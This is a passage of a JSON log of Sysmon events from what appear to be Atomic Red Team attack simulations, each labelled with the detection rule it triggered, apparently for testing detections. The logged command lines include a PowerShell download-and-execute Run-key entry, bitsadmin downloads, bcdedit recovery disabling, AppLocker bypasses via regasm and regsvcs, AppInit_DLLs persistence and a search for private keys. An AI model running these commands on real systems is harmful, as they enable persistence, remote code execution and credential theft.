Rule"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"REG DELETE HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend /v 1 /f\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D772-5D31-0000-001031EB2800","ProcessId":6472,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:45:06.180"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3603,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:45:06.196458Z"}},"Version":5}}}},{"detection":["Godmode Sigma Rule"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"REG DELETE HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend /v 1 /f","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"REG DELETE HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend /v 1 /f\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D772-5D31-0000-001031EB2800","ParentProcessId":6472,"ProcessGuid":"747F3D96-D772-5D31-0000-001083ED2800","ProcessId":6120,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:45:06.209"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3604,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:45:06.213488Z"}},"Version":5}}}},{"detection":["Godmode Sigma Rule"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"powershell.exe \"IEX (New-Object Net.WebClient).DownloadString(`\"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat`\")\"","EventType":"SetValue","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ProcessId":3912,"RuleName":"Persistence - via Run key","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\NextRun","UtcTime":"2019-07-19 14:45:19.416"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":3607,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:45:19.483250Z"}},"Version":2}}}},{"detection":["Startup Folder File Write"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2019-07-18 20:53:13.080","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ProcessId":3912,"RuleName":"","TargetFilename":"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\Notepad.lnk","UtcTime":"2019-07-19 14:45:31.276"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":3609,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:45:31.287863Z"}},"Version":2}}}},{"detection":["Possible Applocker Bypass"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U T1121.dll\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D7A3-5D31-0000-001081B22900","ProcessId":5800,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:45:55.672"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3613,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:45:55.681219Z"}},"Version":5}}}},{"detection":["Possible Applocker Bypass"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U T1121.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Microsoft .NET Assembly Registration Utility","FileVersion":"4.7.3190.0 built by: NET472REL1LAST_C","Hashes":"SHA1=A580AF099F754953480323F6369E5534261F082E,MD5=E99BD2E860B0D73E55708200A600DA35,SHA256=CD5FBB0AC9EBBD64AE84624D428CE30FF17FD586F71F8C5580BC57B176E6716B,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744","Image":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U T1121.dll\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D7A3-5D31-0000-001081B22900","ParentProcessId":5800,"ProcessGuid":"747F3D96-D7A3-5D31-0000-0010D2B42900","ProcessId":6176,"Product":"Microsoft® .NET Framework","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:45:55.694"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3614,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:45:55.699293Z"}},"Version":5}}}},{"detection":["Possible Applocker Bypass"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe\" T1121.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Microsoft .NET Services Installation Utility","FileVersion":"4.7.3190.0 built by: NET472REL1LAST_C","Hashes":"SHA1=7D163D3FA313FC69F2510168EFC1240993AAF7D2,MD5=D15EF1C50607B320C31B5697AD126660,SHA256=549CBF63163B33A1CAD7703D4C8A1EF66EEDFFF249A7ECB181C5D2BD78DA2899,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744","Image":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D7BB-5D31-0000-0010D5092A00","ProcessId":1060,"Product":"Microsoft® .NET Framework","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:46:19.479"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3619,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:46:19.484316Z"}},"Version":5}}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ProcessId":3912,"RuleName":"Persistence or CredAccess - Lsa NotificationPackge","TargetObject":"HKLM\\System\\CurrentControlSet\\Control\\Lsa\\Notification Packages","UtcTime":"2019-07-19 14:47:21.917"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":3632,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:47:21.972037Z"}},"Version":2}}}},{"detection":["New DLL Added to AppInit_DLLs Registry Key"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"C:\\Tools\\MessageBox64.dll,C:\\Tools\\MessageBox32.dll","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"747F3D96-D809-5D31-0000-00105C262B00","ProcessId":6056,"RuleName":"Persistence - AppInit","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\AppInit_DLLs","UtcTime":"2019-07-19 14:47:37.136"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":3635,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:47:37.147054Z"}},"Version":2}}}},{"detection":["Modification of Boot Configuration"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Boot Configuration Data Editor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=AA1B1FDD00B453CFC690357F5AF930EE6D4C19BB,MD5=7BCA6114F94639C9DAAB4BA4E668FBD0,SHA256=1ADEA035FBFF2FC188FF4CD27076BED9E03DB5ECEFFBD59F875A2A1FEEFB16F0,IMPHASH=2137581C3B28D7B500B0C8EB08EE2057","Image":"C:\\Windows\\System32\\bcdedit.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D817-5D31-0000-001064AD2B00","ParentProcessId":6508,"ProcessGuid":"747F3D96-D817-5D31-0000-001097B02B00","ProcessId":396,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:47:51.844"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3648,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:47:51.865963Z"}},"Version":5}}}},{"detection":["Modification of Boot Configuration"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"bcdedit.exe /set {default} recoveryenabled no","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Boot Configuration Data Editor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=AA1B1FDD00B453CFC690357F5AF930EE6D4C19BB,MD5=7BCA6114F94639C9DAAB4BA4E668FBD0,SHA256=1ADEA035FBFF2FC188FF4CD27076BED9E03DB5ECEFFBD59F875A2A1FEEFB16F0,IMPHASH=2137581C3B28D7B500B0C8EB08EE2057","Image":"C:\\Windows\\System32\\bcdedit.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"bcdedit.exe /set {default} recoveryenabled no\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D817-5D31-0000-001049B42B00","ParentProcessId":6216,"ProcessGuid":"747F3D96-D817-5D31-0000-0010B7B62B00","ProcessId":5984,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:47:51.927"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3650,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:47:52.010791Z"}},"Version":5}}}},{"detection":["Bitsadmin Download"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\\Windows\\Temp\\bitsadmin_flag.ps1","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"BITS administration utility","FileVersion":"7.8.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=5DEB6EC7BB9BD0C85BBE91CBFD92BDC774FE5F8A,MD5=5CD8838F1E275B0C8EADF4B755C04E4F,SHA256=03C7E317E277BBD6C9C1159F8718A9D302E6F78E0D80C09D52A994B7598C0F30,IMPHASH=B0A3CFF8CFDE112945189719F82F9EA9","Image":"C:\\Windows\\System32\\bitsadmin.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\\Windows\\Temp\\bitsadmin_flag.ps1\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D824-5D31-0000-001023F42B00","ParentProcessId":6736,"ProcessGuid":"747F3D96-D824-5D31-0000-001075F62B00","ProcessId":1540,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:48:04.122"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3655,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:48:04.131410Z"}},"Version":5}}}},{"detection":["Bitsadmin Download"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"bitsadmin.exe /addfile AtomicBITS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\\Windows\\Temp\\bitsadmin_flag.ps1","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"BITS administration utility","FileVersion":"7.8.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=5DEB6EC7BB9BD0C85BBE91CBFD92BDC774FE5F8A,MD5=5CD8838F1E275B0C8EADF4B755C04E4F,SHA256=03C7E317E277BBD6C9C1159F8718A9D302E6F78E0D80C09D52A994B7598C0F30,IMPHASH=B0A3CFF8CFDE112945189719F82F9EA9","Image":"C:\\Windows\\System32\\bitsadmin.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"bitsadmin.exe /addfile AtomicBITS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\\Windows\\Temp\\bitsadmin_flag.ps1\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D83E-5D31-0000-0010A2D72E00","ParentProcessId":4036,"ProcessGuid":"747F3D96-D83E-5D31-0000-0010AAD92E00","ProcessId":3732,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:48:30.796"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3660,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:48:30.807486Z"}},"Version":5}}}},{"detection":["Discover Private Keys"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"dir c:\\ /b /s .key | findstr /e .key\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D859-5D31-0000-0010FB8F2F00","ProcessId":888,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:48:57.502"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3677,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:48:57.524876Z"}},"Version":5}}}},{"detection":["Discover Private Keys"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"C:\\Windows\\system32\\cmd.exe /S /D /c\" dir c:\\ /b /s .key \"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"dir c:\\ /b /s .key | findstr /e .key\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D859-5D31-0000-0010FB8F2F00","ParentProcessId":888,"ProcessGuid":"747F3D96-D859-5D31-0000-001045922F00","ProcessId":6220,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:48:57.532"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3678,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:48:57.557947Z"}},"Version":5}}}},{"detection":["Discover Private Keys"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"findstr /e .key","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Find String (QGREP) Utility","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=393F2422D22079BFB0022598D70BEB294F2024F4,MD5=DC0816790EFA08AA5B55C1EECFDDB525,SHA256=750AB5E1F3EB18CC42A4A4C7BAB27753F6B26FB9752AD3861833753091044281,IMPHASH=A27641A39DA5A6B0717E06BA00E56B7F","Image":"C:\\Windows\\System32\\findstr.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"dir c:\\ /b /s .key | findstr /e .key\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D859-5D31-0000-0010FB8F2F00","ParentProcessId":888,"ProcessGuid":"747F3D96-D859-5D31-0000-00109E932F00","ProcessId":948,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:48:57.547"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3679,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:48:57.570057Z"}},"Version":5}}}},{"detection":["Query Registry"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"reg query HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query \" HKLM\\SOFTWARE\\Microsoft\\Windows 